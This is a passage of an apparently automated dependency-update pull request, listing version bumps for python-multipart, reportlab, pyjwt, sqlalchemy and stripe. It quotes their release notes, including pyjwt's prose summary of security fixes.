href=\"https://redirect.github.com/Kludex/python-multipart/issues/284\"\u003e#284\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/b0dd125457d0f98de23bf2f894aedb1a54639d4e\"\u003e\u003ccode\u003eb0dd125\u003c/code\u003e\u003c/a\u003e Cap multipart boundary length at 256 bytes (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/282\"\u003e#282\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.26...0.0.30\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `reportlab` from 4.4.10 to 4.5.1\n\nUpdates `pyjwt` from 2.12.1 to 2.13.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `sqlalchemy` from 2.0.49 to 2.0.50\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sqlalchemy/sqlalchemy/releases\"\u003esqlalchemy's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e2.0.50\u003c/h1\u003e\n\u003cp\u003eReleased: May 24, 2026\u003c/p\u003e\n\u003ch2\u003eorm\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where using \u003ccode\u003e_orm.joinedload()\u003c/code\u003e with\n\u003ccode\u003ePropComparator.of_type()\u003c/code\u003e targeting a joined-table subclass combined\nwith \u003ccode\u003ePropComparator.and_()\u003c/code\u003e referencing a column on that subclass\nwould generate invalid SQL, where the subclass column was not adapted to\nthe subquery alias.  Pull request courtesy Joaquin Hui Gomez.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13203\"\u003e#13203\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where the presence of a \u003ccode\u003eSessionEvents.do_orm_execute()\u003c/code\u003e\nevent hook would cause internal execution options such as \u003ccode\u003eyield_per\u003c/code\u003e and\nloader-specific state from the first \u003ccode\u003eorm_pre_session_exec\u003c/code\u003e pass to leak\ninto the second pass, leading to errors when using relationship loaders\nsuch as \u003ccode\u003eselectinload()\u003c/code\u003e and \u003ccode\u003eimmediateload()\u003c/code\u003e.  The execution\noptions passed to the second compilation pass are now based on the original\noptions plus only the explicit updates made via\n\u003ccode\u003eORMExecuteState.update_execution_options()\u003c/code\u003e within the event hook.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13301\"\u003e#13301\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where using \u003ccode\u003e_orm.with_polymorphic()\u003c/code\u003e on a leaf class (a\nsubclass with no further descendants) or a non-inherited class would fail\nwith an \u003ccode\u003eAttributeError\u003c/code\u003e when used in an ORM statement, due to\n\u003ccode\u003e_orm.configure_mappers()\u003c/code\u003e not being triggered implicitly. The fix\nensures that \u003ccode\u003eAliasedInsp\u003c/code\u003e participates in the \u003ccode\u003e_post_inspect\u003c/code\u003e\nhook, triggering mapper configuration during ORM statement compilation.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13319\"\u003e#13319\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esql\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[sql] [bug]\u003c/strong\u003e Fixed issue where floor division (\u003ccode\u003e//\u003c/code\u003e) between a \u003ccode\u003eFloat\u003c/code\u003e or\n\u003ccode\u003eNumeric\u003c/code\u003e numerator and an \u003ccode\u003eInteger\u003c/code\u003e denominator would omit\nthe \u003ccode\u003eFLOOR()\u003c/code\u003e SQL wrapper on dialects where\n\u003ccode\u003eDialect.div_is_floordiv\u003c/code\u003e is \u003ccode\u003eTrue\u003c/code\u003e (the default, including\nPostgreSQL and SQLite).  \u003ccode\u003eFLOOR()\u003c/code\u003e is now applied if either the\ndenominator or the numerator is a non-integer, so that expressions such as\n\u003ccode\u003efloat_col // int_col\u003c/code\u003e render as \u003ccode\u003eFLOOR(float_col / int_col)\u003c/code\u003e instead\nof the incorrect \u003ccode\u003efloat_col / int_col\u003c/code\u003e.  Pull request courtesy r266-tech.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/10528\"\u003e#10528\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003epostgresql\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/sqlalchemy/sqlalchemy/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `stripe` from 15.1.0 to 15.2.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/stripe/stripe-python/releases\"\u003estripe's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev15.2.0\u003c/h2\u003e\n\u003cp\u003eThis release changes the pinned API version to 2026-05-27.dahlia.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/stripe/stripe-python/pull/1816\"\u003e#1816\u003c/a\u003e Update generated code\n\u003cul\u003e\n\u003cli\u003eAdd support for new resource \u003ccode\u003ev2.commerce.ProductCatalogImport\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ecreate\u003c/code\u003e and \u003ccode\u003eretrieve\u003c/code\u003e methods on resource \u003ccode\u003ev2.commerce.ProductCatalogImport\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ebizum_payments\u003c/code\u003e and \u003ccode\u003escalapay_payments\u003c/code\u003e on \u003ccode\u003eAccount.Capability\u003c/code\u003e, \u003ccode\u003eAccountCreateParamsCapability\u003c/code\u003e, and \u003ccode\u003eAccountModifyParamsCapability\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003eautomatic_transfer_rules_by_currency\u003c/code\u003e on \u003ccode\u003eBalanceSettings.Payment.Payout\u003c/code\u003e and \u003ccode\u003eBalanceSettingsModifyParamsPaymentPayout\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003estart_of_day\u003c/code\u003e on \u003ccode\u003eBalanceSettings.Payment.SettlementTiming\u003c/code\u003e and \u003ccode\u003eBalanceSettingsModifyParamsPaymentSettlementTiming\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003edescription\u003c/code\u003e on \u003ccode\u003eChargeCreateParamsTransferDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntent.TransferDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsTransferDatum\u003c/code\u003e, and \u003ccode\u003ePaymentIntentModifyParamsTransferDatum\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ebizum\u003c/code\u003e on \u003ccode\u003eCharge.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003eConfirmationToken.PaymentMethodPreview\u003c/code\u003e, \u003ccode\u003eConfirmationTokenCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentAttemptRecord.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003ePaymentIntent.PaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfigurationCreateParams\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfigurationModifyParams\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfiguration\u003c/code\u003e, \u003ccode\u003ePaymentMethodCreateParams\u003c/code\u003e, \u003ccode\u003ePaymentMethod\u003c/code\u003e, \u003ccode\u003ePaymentRecord.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003eSetupIntent.PaymentMethodOption\u003c/code\u003e, \u003ccode\u003eSetupIntentConfirmParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003eSetupIntentConfirmParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003eSetupIntentCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003eSetupIntentCreateParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003eSetupIntentModifyParamsPaymentMethodDatum\u003c/code\u003e, and \u003ccode\u003eSetupIntentModifyParamsPaymentMethodOption\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003escalapay\u003c/code\u003e on \u003ccode\u003eCharge.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003eCheckout.Session.PaymentMethodOption\u003c/code\u003e, \u003ccode\u003eConfirmationToken.PaymentMethodPreview\u003c/code\u003e, \u003ccode\u003eConfirmationTokenCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentAttemptRecord.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003ePaymentIntent.PaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfigurationCreateParams\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfigurationModifyParams\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfiguration\u003c/code\u003e, \u003ccode\u003ePaymentMethodCreateParams\u003c/code\u003e, \u003ccode\u003ePaymentMethod\u003c/code\u003e, \u003ccode\u003ePaymentRecord.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003eRefund.DestinationDetail\u003c/code\u003e, \u003ccode\u003eSetupIntentConfirmParamsPaymentMethodDatum\u003c/code\u003e, 